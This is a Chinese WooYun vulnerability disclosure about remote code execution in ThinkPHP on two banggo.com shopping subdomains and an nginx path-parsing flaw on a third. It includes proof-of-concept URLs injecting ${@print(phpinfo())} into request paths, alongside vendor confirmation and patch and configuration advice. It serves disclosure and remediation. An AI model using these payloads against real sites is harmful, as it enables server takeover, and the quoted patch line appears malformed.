当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013993

漏洞标题:美特斯邦威两个商城代码执行导致直接沦陷+某子站nginx解析漏洞

相关厂商:banggo.com

漏洞作者: Seay

提交时间:2012-10-29 13:40

修复时间:2012-12-13 13:41

公开时间:2012-12-13 13:41

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-29: 细节已通知厂商并且等待厂商处理中
2012-10-29: 厂商已经确认,细节仅向厂商公开
2012-11-08: 细节向核心白帽子及相关领域专家公开
2012-11-18: 细节向普通白帽子公开
2012-11-28: 细节向实习白帽子公开
2012-12-13: 细节向公众公开

简要描述:

美特斯邦威两个商城PHP代码执行导致直接沦陷;
某子站nginx解析漏洞

详细说明:

两个商城ThinkPHP框架URI任意代码执行漏洞
http://ampm.banggo.com/Goods/allcomment_616513.shtml/abc-abc-abc-$%7B@print(phpinfo())%7D/
http://tuan.banggo.com/pptuan/10-0-1-0.shtml/abc/abc/abc/$%7B@print(phpinfo())%7D
代码执行,直接就可以getshell了。
还有一个nginx解析漏洞:http://express.banggo.com/css/templatecss/global.css/seay.php

漏洞证明:

亲,直接上图了哦。
代码执行的两个站:



nginx解析漏洞


修复方案:

亲爱的美邦,一直很喜欢哇,求礼物,求鼓励。
thinkphp的代码执行,
可下载官方发布的补丁:

http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

或者或者直接修改源码:
/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改为
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
nginx解析漏洞修复:
引用自百度:
1 关闭php.ini里的path_info,cgi.path_info设置成0.如果默认前面有;或者就没这段,就手动加上cgi.path_info = 0,2 修改nginx里的设置。
比如原始文件
server {
listen 80;
server_name typengine.com;
location / {
root /home/www/typengine.com;
index index.php index.html index.htm;
autoindex on;
}
location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}
fastcgi_param SCRIPT_FILENAME /home/www/typengine.com$fastcgi_script_name;
include fastcgi_params;
}
}

版权声明:转载请注明来源 Seay@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-29 14:29

厂商回复:

谢谢好友提醒

最新状态:

暂无